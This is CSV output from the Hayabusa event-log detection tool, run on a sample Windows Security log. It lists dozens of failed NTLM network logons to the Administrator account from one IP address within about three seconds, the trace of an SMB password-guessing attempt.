2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aASpkRuPfE8Nl64n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MSI2b7LpZpWO3xJW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: avNkOq3fsGN3yYJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wnlgy6dW33tRk6UX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: msJ8QrqMluTeUlM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H33NuKduMuskxL0D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BHjp69CD1ttbaK2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5uxByLPApvfeIhU2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6g0WOAnoGpKyEyzW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P8MTs4Nkbm3ryqcp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Nyd7tr3y0BHmPLM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J5KiDQOEnDf6xEPN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3MBP1buuRcBRiQTG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXXdcg3MSqnGSvax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Kej7zgIDCNR5tnnp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gjM8SOeQXwytB6iw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XPNATM0IL05vtbZ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H56ci5gbBVzebS2j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6rRofLg1uxrojU7n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MAhtwTU8OttAhcxf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CwKgAR6OWbkFlxUy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lNZR4G0DVsXVg4A9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OZG99tl0RRN3cQoK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nwRzAutxa07Y1xE4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OwhvrVBSRa8RcCKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bLBwBys2favoK7BQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3oYpj1rGcsOWNSs7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IBogtzE6No62tJB9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQJICDi3T4LiwXZc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnlKkfHYT0ID3BWr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gw36XaWrYp2M9CZd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9aT76CAAER0H98I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TEOZfrP3IYmutAuq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zd54DAwwp0BJhhaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AR6Gc128RlPtwcPl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cpjS1YZy2sSRqzI3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EKeate89Gw1oEp0U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tBhApsBYa65Hxr0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITv5RS3WHhWe0Hez  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WASvcAp9zfU3uSka  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H1f6szOactEp5ntF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Loe5RkT9Ki0Aw2Lv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJdVtE7dNSoyM3LI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QlAtU1mIO7m5DnuP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wAK2rh94yKwiH2Nw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AuqsvmUbPlpWFBRZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BShEB6VnXkOxwtFB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AjAc5QMvpTBsDziO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fwwp5CD20dR8QrIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tL6GzVzndZL7DZMN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zK5IpESvDA2DexwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qvTyabCyGaxscOrN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FW8VghddPwP5C6dO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGZuyZ0LErZ3Sgty  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bT1xrvfndr5R8Vg3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H6RFTZVJE9remzqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pzjwzORvTwuBPLEs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UMjSFfZ88BV2sT1F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SnpCLI2EJZRhr3vz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ztEU2m9SwbqgSdVY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MHO1X0zwmoWotcM4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ck429g2Cs4siVVq4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9txH9zA3oY885iTi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: alIIEzE2rTrNtOtr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ww4BXLwhaNxOttgo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GPdz2pjDocMWqctT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QOm1i2a20IDNmIu4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ukSrSu516dHlHQ94  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: grdERCipFl1FMB1o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmpuUsIRbp57KCRD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VWLuqrOQSQuqcwUr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eEASOf84AX8ow4vf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IcgNTGlESh6FytEY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
